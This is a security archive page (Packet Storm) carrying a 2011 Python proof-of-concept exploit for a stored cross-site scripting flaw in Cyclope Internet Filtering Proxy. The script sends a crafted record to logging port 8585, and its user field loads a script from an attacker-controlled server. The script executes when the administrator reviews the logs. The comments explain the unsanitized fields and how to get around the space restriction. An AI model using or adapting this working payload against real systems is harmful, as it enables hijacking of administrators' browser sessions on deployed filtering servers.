exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cyclope Internet Filtering Proxy Cross Site Scripting

Cyclope Internet Filtering Proxy Cross Site Scripting
Posted Oct 20, 2011
Authored by loneferret

Cyclope Internet Filtering Proxy suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 2ae6988217abbff9103711510b40b94c33812480a0cbdbb90ceefbd299e54ed1

Cyclope Internet Filtering Proxy Cross Site Scripting

Change Mirror Download
#!/usr/bin/python

# Title: Cyclope Internet Filtering Proxy - Stored XSS Vuln.
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Software link: http://www.cyclope-series.com/download/index.aspx?p=2

# Date Found: Oct 20th 2011
# Tested on: Windows XP SP3 Professional / Windows Server 2008 R2 Standard
# Tested with: Registered and Unregistered versions
# Nod to the Exploit-DB Team

# The Cyclope Internet Filtering Proxy is your basic white & black list website navigation filtering app.
# It will log all of the client's activities such as visited web sites, the time etc.
# There's an optional client application if the administrator wishes to acquire the computer name and user
# information.

# This XSS vulnerability is due to the fact that nothing is sanitized in the web-based management console.
# The whitelist and blacklist patterns, for example, are vulnerable. As well as computer name and user fields
# gathered via the logging port.
# This PoC takes advantage of the "user" field (but also works with computer feild). One needs to send in the correct order:
# <user>USER</user><computer>COMPUTER</computer><ip>IP ADDY</ip>\n to the default log port 8585.
# None of these fileds are sanitized. So it's making this XSS a bit more interesing.
# Atacking machine doesn't need the Cyclope client app installed.
# Limited in what can be sent, a space will screw up any code you send. The HTML code &nbsp; will usually fix that problem,
# as well as all the other HTML codes for quotes and so on.
# So we can remotely inserted our evil XSS, and have it executed when the administrator looks over the logs.

# As always, if anyone wants to take this PoC to the next level, be my guest.
# Have fun,
# loneferret

import struct
import socket

# Remember to enter a webserver with a js file
buffer = "<user><SCRIPT/SRC=http://xxx.xxx.xxx.xxx/xss.js></SCRIPT></user><computer>Windows</computer><ip>2.2.2.2</ip>\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "\nSending evil buffer..."
s.connect(('xxx.xxx.xxx.xxx',8585)) #Enter Cyclope server IP address
s.send(buffer)
s.close()
print "\nDone! "

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close